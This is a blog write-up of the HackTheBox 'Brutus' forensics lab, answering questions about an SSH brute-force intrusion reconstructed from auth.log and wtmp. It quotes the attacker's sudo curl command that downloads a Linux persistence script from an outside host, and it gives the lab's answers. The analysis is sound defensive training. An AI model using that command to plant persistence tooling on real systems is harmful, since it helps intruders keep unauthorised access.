![Cover image for [HTB] Sherlock - Brutus](https://media.dev.to/cdn-cgi/image/width=1000,height=420,fit=cover,gravity=auto,format=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftur53y1ajzbqekregwd9.png)
Hello, this is my writeup for the Brutus Sherlock on HackTheBox.
Step 1: preparation
In a first step, I download the zip file and I use the password given to extract the archive.
There is two files inside:
- auth.log (linux file that keep track of authentication, whereas they are successful or not)
- wtmp (keep track of terminal creation or terminal assignement for users)
I first wanted to do this sherlock on my macbook, but the wtmp file is hard to open on a mac, so I sent these files to my kali vm.
scp -r Brutus/ KALI_USER@VM_IP:~/Desktop
Step 2: analysis
Question 1: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?
After a small analysis of the auth.log, I can see that starting at 06:31:31, there is a lot of invalid user & password from IP 65.2.161.68.
Question 2: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
I continue to deep dive into the auth.log and I can see that at 06:31:40, there is an accepted password for root from the above brute force IP (65.2.161.68).
Question 3: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
As we can see, after that the brute force attack successfully find the root password, some other authentication failed form the same IP, so the brute force attack is still in progress.
Later on the file, at 06:32:44, I can see that the root user has recreated a session from the attacker’s IP.
The timestamp 06:32:44 doesn’t works for answer, so I need to go inside wtmp file to check for the real timestamp of the root terminal, but the file seems to be corrupted on my side and it’s quite empty.
I choosed to go to the official write-up to get the timestamp 06:32:45.
Question 4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Quite simple, under the successful login for root from attacker’s IP, we can see new session 37 for user root.
Question 5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
Still on the auth.log, I can see at 06:34:18 that a group cyberjunkie and a user were created.
Later, at 06:35:15, the cyberjunkie user is added to group sudo.
Question 6: What is the MITRE ATT&CK sub-technique ID used for persistence?
After a little bit of research, the following sub-technique seems to be the related one.
Question 7: How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
So the session started at 06:32:45 (question 3), and on the auth.log I can see that the session 37 was closed 06:37:24, after some crazy maths: 279 sec.
Question 8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
At 06:37:34 a new session was created for the user cyberjunkie.
At 06:39:38 he launched a command as sudo that is:
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Step 3: that's it
It was my first Sherlock on HTB and it was really fun!
If you want to subscribe to the HackTheBox Academy, you can use my referral link!
Top comments (0)